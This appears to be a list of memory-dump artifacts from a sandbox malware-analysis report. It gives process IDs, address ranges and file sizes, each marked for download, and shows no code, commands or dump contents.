memory/3744-252-0x0000000003741000-0x000000000376C000-memory.dmp

Filesize
172KB

Download
memory/3744-251-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/3880-143-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/3884-286-0x0000000001190000-0x0000000001192000-memory.dmp

Filesize
8KB

Download
memory/3884-282-0x00007FFFCBDF0000-0x00007FFFCC790000-memory.dmp

Filesize
9.6MB

Download
memory/4020-29-0x0000000000401000-0x00000000004B7000-memory.dmp

Filesize
728KB

Download
memory/4104-169-0x0000000003920000-0x0000000003921000-memory.dmp

Filesize
4KB

Download
memory/4104-159-0x00000000037C0000-0x00000000037C1000-memory.dmp

Filesize
4KB

Download
memory/4104-142-0x00000000006A0000-0x00000000006A1000-memory.dmp

Filesize
4KB

Download
memory/4104-151-0x0000000003931000-0x0000000003939000-memory.dmp

Filesize
32KB

Download
memory/4104-154-0x0000000003AC1000-0x0000000003ACD000-memory.dmp

Filesize
48KB

Download
memory/4104-107-0x00000000032B1000-0x0000000003496000-memory.dmp

Filesize
1.9MB

Download
memory/4120-210-0x00000000044E0000-0x00000000044E1000-memory.dmp

Filesize
4KB

Download
memory/4120-209-0x00000000044E0000-0x00000000044E1000-memory.dmp

Filesize
4KB

Download
memory/4156-81-0x00000000006E0000-0x00000000006E1000-memory.dmp

Filesize
4KB

Download
memory/4228-89-0x0000000000401000-0x00000000004A9000-memory.dmp

Filesize
672KB

Download
memory/4284-215-0x0000000004600000-0x0000000004601000-memory.dmp

Filesize
4KB

Download
memory/4316-148-0x0000000071F80000-0x000000007266E000-memory.dmp

Filesize
6.9MB

Download
memory/4316-162-0x00000000078E0000-0x00000000078E1000-memory.dmp

Filesize
4KB

Download
memory/4316-160-0x0000000005030000-0x0000000005031000-memory.dmp

Filesize
4KB

Download
memory/4316-278-0x0000000005033000-0x0000000005034000-memory.dmp

Filesize
4KB

Download
memory/4316-166-0x0000000005032000-0x0000000005033000-memory.dmp

Filesize
4KB

Download
memory/4316-155-0x0000000005080000-0x0000000005081000-memory.dmp

Filesize
4KB

Download
memory/4348-129-0x0000000004B22000-0x0000000004B23000-memory.dmp

Filesize
4KB

Download
memory/4348-216-0x0000000005660000-0x0000000005661000-memory.dmp

Filesize
4KB

Download
memory/4348-135-0x0000000002620000-0x0000000002621000-memory.dmp

Filesize
4KB

Download
memory/4348-225-0x0000000006000000-0x0000000006001000-memory.dmp

Filesize
4KB

Download
memory/4348-133-0x00000000024D0000-0x00000000024F8000-memory.dmp

Filesize
160KB

Download
memory/4348-221-0x0000000005D10000-0x0000000005D11000-memory.dmp

Filesize
4KB

Download
memory/4348-219-0x0000000005CF0000-0x0000000005CF1000-memory.dmp

Filesize
4KB

Download
memory/4348-126-0x0000000002450000-0x000000000247A000-memory.dmp

Filesize
168KB

Download
memory/4348-134-0x0000000004B23000-0x0000000004B24000-memory.dmp

Filesize
4KB

Download
memory/4348-184-0x0000000004B24000-0x0000000004B26000-memory.dmp

Filesize
8KB

Download
memory/4348-113-0x0000000002200000-0x0000000002201000-memory.dmp

Filesize
4KB

Download
memory/4348-213-0x0000000005480000-0x0000000005481000-memory.dmp

Filesize
4KB

Download
memory/4348-119-0x0000000071F80000-0x000000007266E000-memory.dmp

Filesize
6.9MB

Download
memory/4348-127-0x0000000004B20000-0x0000000004B21000-memory.dmp

Filesize
4KB

Download
memory/4384-124-0x0000000000800000-0x0000000000801000-memory.dmp

Filesize
4KB

Download
memory/4400-161-0x00000000073F0000-0x000000000744D000-memory.dmp

Filesize
372KB

Download
memory/4400-170-0x0000000005C80000-0x0000000005C8B000-memory.dmp

Filesize
44KB

Download
memory/4400-132-0x0000000005860000-0x0000000005861000-memory.dmp

Filesize
4KB

Download
memory/4400-120-0x0000000000F00000-0x0000000000F01000-memory.dmp

Filesize
4KB

Download
memory/4400-138-0x00000000057B0000-0x00000000057B1000-memory.dmp

Filesize
4KB

Download
memory/4400-125-0x0000000005CC0000-0x0000000005CC1000-memory.dmp

Filesize
4KB

Download
memory/4400-141-0x00000000057F0000-0x00000000057F1000-memory.dmp

Filesize
4KB

Download
memory/4400-165-0x0000000007500000-0x0000000007501000-memory.dmp

Filesize
4KB

Download
memory/4400-114-0x0000000071F80000-0x000000007266E000-memory.dmp

Filesize
6.9MB

Download
memory/4400-289-0x00000000098E0000-0x000000000992B000-memory.dmp

Filesize
300KB

Download
memory/4432-206-0x0000000001142000-0x0000000001143000-memory.dmp

Filesize
4KB

Download
memory/4432-291-0x0000000008BB0000-0x0000000008BE3000-memory.dmp

Filesize
204KB

Download
memory/4432-298-0x00000000088C0000-0x00000000088C1000-memory.dmp

Filesize
4KB

Download
memory/4432-299-0x000000007F0D0000-0x000000007F0D1000-memory.dmp

Filesize
4KB

Download
memory/4432-300-0x0000000008CE0000-0x0000000008CE1000-memory.dmp

Filesize
4KB

Download
memory/4432-205-0x0000000001140000-0x0000000001141000-memory.dmp

Filesize
4KB

Download
memory/4432-199-0x0000000071F80000-0x000000007266E000-memory.dmp

Filesize
6.9MB

Download
memory/4432-305-0x0000000008E70000-0x0000000008E71000-memory.dmp

Filesize
4KB

Download
memory/4432-306-0x0000000001143000-0x0000000001144000-memory.dmp

Filesize
4KB

Download
memory/4556-190-0x0000000008180000-0x0000000008181000-memory.dmp

Filesize
4KB

Download
memory/4556-287-0x000000000AB20000-0x000000000AB21000-memory.dmp

Filesize
4KB

Download
memory/4556-230-0x0000000009CF0000-0x0000000009CF1000-memory.dmp

Filesize
4KB

Download
memory/4556-178-0x00000000050F2000-0x00000000050F3000-memory.dmp

Filesize
4KB

Download
memory/4556-168-0x00000000050F0000-0x00000000050F1000-memory.dmp

Filesize
4KB

Download
memory/4556-276-0x00000000050F3000-0x00000000050F4000-memory.dmp

Filesize
4KB

Download
memory/4556-232-0x0000000009670000-0x0000000009671000-memory.dmp

Filesize
4KB

Download
memory/4556-158-0x0000000071F80000-0x000000007266E000-memory.dmp

Filesize
6.9MB

Download
memory/4556-185-0x00000000076B0000-0x00000000076B1000-memory.dmp

Filesize
4KB

Download
memory/4556-187-0x0000000007750000-0x0000000007751000-memory.dmp

Filesize
4KB

Download
memory/4556-188-0x0000000008040000-0x0000000008041000-memory.dmp

Filesize
4KB

Download
memory/4556-200-0x0000000008970000-0x0000000008971000-memory.dmp

Filesize
4KB

Download
memory/4556-198-0x00000000080F0000-0x00000000080F1000-memory.dmp

Filesize
4KB

Download
memory/4972-280-0x0000000004A10000-0x0000000004A11000-memory.dmp

Filesize
4KB

Download
memory/5020-269-0x00000000050C0000-0x00000000050C1000-memory.dmp

Filesize
4KB

Download
memory/5020-268-0x00000000050B0000-0x00000000050B1000-memory.dmp

Filesize
4KB

Download
memory/5020-266-0x0000000005090000-0x0000000005091000-memory.dmp

Filesize
4KB

Download
memory/5020-253-0x0000000005010000-0x0000000005011000-memory.dmp

Filesize
4KB

Download
memory/5020-262-0x0000000005060000-0x0000000005061000-memory.dmp

Filesize
4KB

Download
memory/5020-270-0x00000000050D0000-0x00000000050D1000-memory.dmp

Filesize
4KB

Download
memory/5020-272-0x00000000050F0000-0x00000000050F1000-memory.dmp

Filesize
4KB

Download
memory/5020-273-0x0000000005100000-0x0000000005101000-memory.dmp

Filesize
4KB

Download
memory/5020-271-0x00000000050E0000-0x00000000050E1000-memory.dmp

Filesize
4KB

Download
memory/5020-274-0x0000000005110000-0x0000000005111000-memory.dmp

Filesize
4KB

Download
memory/5020-264-0x0000000005070000-0x0000000005071000-memory.dmp

Filesize
4KB

Download
memory/5020-260-0x0000000005050000-0x0000000005051000-memory.dmp

Filesize
4KB

Download
memory/5020-265-0x0000000005080000-0x0000000005081000-memory.dmp

Filesize
4KB

Download
memory/5020-267-0x00000000050A0000-0x00000000050A1000-memory.dmp

Filesize
4KB

Download
memory/5020-258-0x0000000005040000-0x0000000005041000-memory.dmp

Filesize
4KB

Download
memory/5020-257-0x0000000005030000-0x0000000005031000-memory.dmp

Filesize
4KB

Download
memory/5020-256-0x0000000005020000-0x0000000005021000-memory.dmp

Filesize
4KB

Download
memory/5020-248-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/5020-249-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/5020-243-0x0000000003931000-0x000000000395C000-memory.dmp

Filesize
172KB

Download
memory/5108-183-0x0000000000400000-0x000000000052C000-memory.dmp

Filesize
1.2MB

Download
memory/5108-179-0x00000000024C0000-0x00000000025EC000-memory.dmp

Filesize
1.2MB

Download
memory/5320-301-0x0000000004C30000-0x0000000004C31000-memory.dmp

Filesize
4KB

Download